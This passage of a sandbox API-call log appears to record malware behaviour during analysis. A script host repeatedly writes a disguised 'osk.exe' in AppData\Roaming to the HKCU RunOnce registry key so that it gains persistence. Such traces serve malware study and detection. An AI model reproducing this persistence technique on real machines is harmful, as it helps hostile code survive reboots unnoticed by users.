Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0079.676] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0079.676] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0079.676] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0079.676] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x4a [0079.676] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0079.676] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x4b [0079.676] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), 
pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0079.677] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x4a [0079.677] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.677] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0079.677] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.677] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.677] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0079.677] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0079.677] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0079.677] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0079.677] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0079.677] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0079.678] WideCharToMultiByte (in: 
CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0079.678] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0079.678] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0079.678] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0079.678] RegCloseKey (hKey=0x280) returned 0x0 [0079.678] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.678] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.678] SetTimer (hWnd=0x20280, nIDEvent=0x204a, uElapse=0xa, lpTimerFunc=0x0) returned 0x204a [0079.678] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0079.690] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0079.690] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0079.690] KillTimer (hWnd=0x20280, uIDEvent=0x204a) returned 1 [0079.691] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.691] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0079.691] IUnknown:Release (This=0x787518) returned 0x1 [0079.691] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, 
riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0079.691] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0079.691] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0079.691] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0079.691] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0079.691] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: 
ppvObject=0x33ef50*=0x0) returned 0x80004002 [0079.691] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0079.691] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0079.691] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0079.692] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x4b [0079.692] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0079.692] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x4c [0079.692] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0079.692] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x4b [0079.692] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.693] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0079.693] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.693] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.693] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0079.693] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0079.693] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0079.693] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0079.693] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0079.693] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0079.693] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", 
cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0079.693] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0079.693] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0079.693] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0079.693] RegCloseKey (hKey=0x280) returned 0x0 [0079.693] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.693] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.693] SetTimer (hWnd=0x20280, nIDEvent=0x204b, uElapse=0xa, lpTimerFunc=0x0) returned 0x204b [0079.694] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0079.706] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0079.706] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0079.706] KillTimer (hWnd=0x20280, uIDEvent=0x204b) returned 1 [0079.706] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.707] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0079.707] IUnknown:Release (This=0x787518) returned 0x1 [0079.707] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, 
[7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0079.707] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0079.707] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0079.707] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0079.707] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0079.707] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0079.707] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, 
riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0079.707] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0079.707] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0079.708] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x4c [0079.708] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0079.708] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x4d [0079.708] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), 
pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0079.708] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x4c [0079.709] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.709] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0079.709] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.709] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.709] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0079.709] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0079.709] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0079.712] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0079.712] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0079.712] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0079.712] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, 
lpUsedDefaultChar=0x0) returned 54 [0079.712] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0079.712] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0079.712] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0079.712] RegCloseKey (hKey=0x280) returned 0x0 [0079.712] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.712] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.713] SetTimer (hWnd=0x20280, nIDEvent=0x204c, uElapse=0xa, lpTimerFunc=0x0) returned 0x204c [0079.713] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0079.721] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0079.721] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0079.722] KillTimer (hWnd=0x20280, uIDEvent=0x204c) returned 1 [0079.722] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.722] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0079.722] IUnknown:Release (This=0x787518) returned 0x1 [0079.722] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) 
returned 0x0 [0079.722] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0079.722] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0079.722] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0079.722] 